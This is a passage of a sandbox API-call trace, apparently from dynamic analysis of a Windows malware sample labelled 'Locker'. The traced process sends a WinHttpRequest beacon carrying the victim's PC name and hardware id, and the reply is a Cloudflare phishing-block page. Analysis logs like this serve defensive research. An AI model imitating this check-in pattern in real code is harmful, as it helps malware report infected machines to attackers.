ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x6, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.489] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.489] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x7, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.489] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.489] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x8, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.489] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.489] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x9, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.489] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.489] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0xa, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.489] ITypeInfo:LocalReleaseTypeAttr (This=0xe0cdb4) returned 0xe47b90 [0254.489] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.489] WinHttpRequest:IUnknown:Release (This=0xe0cdb4) returned 0x1 [0254.489] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x34) returned 0xeb4f28 [0254.490] WinHttpRequest:IDispatch:Invoke (in: This=0xca3298, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f230*(rgvarg=([0]=0xeb4f2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xeb4f3c*(varType=0x8, wReserved1=0x0, wReserved2=0x8703, wReserved3=0x4295, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8, puArgErr=0x87f240 | out: pDispParams=0x87f230*(rgvarg=([0]=0xeb4f2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="application/x-www-form-urlencoded", varVal2=0x0), [1]=0xeb4f3c*(varType=0x8, wReserved1=0x0, wReserved2=0x8703, wReserved3=0x4295, varVal1="Content-Type", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f240*=0x2b5995) returned 0x0 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd824f0 | out: hHeap=0xc60000) returned 1 [0254.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a198 [0254.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b78 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeb4f28 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a180 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0254.490] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a180 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed8220 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832e0 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0254.490] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a180 | out: hHeap=0xc60000) returned 1 [0254.491] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b78 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a180 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a08 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe832e0 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a198 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7b620 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83308 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a078 [0254.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832e0 | out: hHeap=0xc60000) returned 1 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19a8 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd824f0 [0254.491] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xd7a198 [0254.491] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xca3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f148*="Send", cNames=0x1, lcid=0x800, rgDispId=0x87f24c | out: rgDispId=0x87f24c*=5) returned 0x0 [0254.491] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.491] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xca3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f140 | out: ppTInfo=0x87f140*=0xe0cdb4) returned 0x0 [0254.491] ITypeInfo:RemoteGetTypeAttr (in: This=0xe0cdb4, ppTypeAttr=0x87f138, pDummy=0x356310 | out: ppTypeAttr=0x87f138, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalGetIDsOfNames (This=0xe0cdb4) returned 0x0 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x0, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x1, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x2, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x3, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x4, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x5, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x6, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x7, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x8, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x9, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0xa, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0xb, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0xc, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.492] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0xd, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.492] ITypeInfo:LocalReleaseTypeAttr (This=0xe0cdb4) returned 0xe47b90 [0254.493] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.493] WinHttpRequest:IUnknown:Release (This=0xe0cdb4) returned 0x1 [0254.493] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe97800 [0254.493] WinHttpRequest:IDispatch:Invoke (in: This=0xca3298, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f230*(rgvarg=([0]=0xe97804*(varType=0x8, wReserved1=0xe8, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=c0gk8REhIdSCbgHx2ExgQNUF&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8, puArgErr=0x87f240 | out: pDispParams=0x87f230*(rgvarg=([0]=0xe97804*(varType=0x8, wReserved1=0xe8, wReserved2=0x10, wReserved3=0x0, varVal1="pcname=XDUWTFONO&hwid=c0gk8REhIdSCbgHx2ExgQNUF&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f240*=0x2b5995) returned 0x0 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd824f0 | out: hHeap=0xc60000) returned 1 [0254.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a520 [0254.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a5f8 [0254.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26738 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca2880 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1938 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79dd8 | out: hHeap=0xc60000) returned 1 [0254.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79dd8 [0254.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc29d8 [0254.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1938 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe97800 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0254.647] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a520 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a180 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83308 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a5f8 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26738 | out: hHeap=0xc60000) returned 1 [0254.647] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.648] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26738 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26758 [0254.648] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83308 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe266f8 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd824f0 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1a) returned 0xe83600 [0254.648] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xca3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f148*="ResponseText", cNames=0x1, lcid=0x800, rgDispId=0x87f24c | out: rgDispId=0x87f24c*=9) returned 0x0 [0254.648] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83600 | out: hHeap=0xc60000) returned 1 [0254.648] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xec1c08 [0254.648] WinHttpRequest:IDispatch:Invoke (in: This=0xca3298, dispIdMember=9, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x3, pDispParams=0x87f230*(rgvarg=0xec1c0c, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x87f218, pExcepInfo=0x87f1f8, puArgErr=0x87f240 | out: pDispParams=0x87f230*(rgvarg=0xec1c0c, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x87f218*(varType=0x8, wReserved1=0x7738, wReserved2=0xc, wReserved3=0x0, varVal1="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", varVal2=0xd791a8), pExcepInfo=0x87f1f8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f240*=0x2b5995) returned 0x0 [0254.652] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd824f0 | out: hHeap=0xc60000) returned 1 [0254.652] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a610 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1fb0) returned 0xeeae60 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe266c8 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec1c08 | out: hHeap=0xc60000) returned 1 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe266f8 | out: hHeap=0xc60000) returned 1 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a610 | out: hHeap=0xc60000) returned 1 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83308 | out: hHeap=0xc60000) returned 1 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26758 | out: hHeap=0xc60000) returned 1 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26738 | out: hHeap=0xc60000) returned 1 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83308 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a610 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26738 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a610 | out: hHeap=0xc60000) returned 1 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83790 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a610 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a370 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7b620 | out: hHeap=0xc60000) returned 1 [0254.653] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe837b8 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xe26758 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a358 [0254.653] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe26758 | out: hHeap=0xc60000) returned 1 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe1a388 [0254.653] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xe26758 [0254.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4050 [0254.654] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xfd2) returned 0xee6ef8 [0254.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0xee6ef8, cbMultiByte=4050, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", lpUsedDefaultChar=0x0) returned 4050 [0254.654] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe1a388 | out: hHeap=0xc60000) returned 1 [0254.654] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xfe0) returned 0xeece18 [0254.654] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee6ef8 | out: hHeap=0xc60000) returned 1 [0254.654] GetLastError () returned 0x0 [0254.654] SetLastError (dwErrCode=0x0) [0254.654] GetLastError () returned 0x0 [0254.654] SetLastError (dwErrCode=0x0) [0254.654] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xca4290, nNumberOfBytesToWrite=0xfd1, lpNumberOfBytesWritten=0x87db50, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x87db50, lpOverlapped=0x0) returned 0 [0254.654] GetLastError () returned 0x6 [0254.654] GetLastError () returned 0x6 [0254.654] SetLastError (dwErrCode=0x6) [0254.654] GetLastError () returned 0x6 [0254.654] SetLastError (dwErrCode=0x6) [0254.654] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeece18 | out: 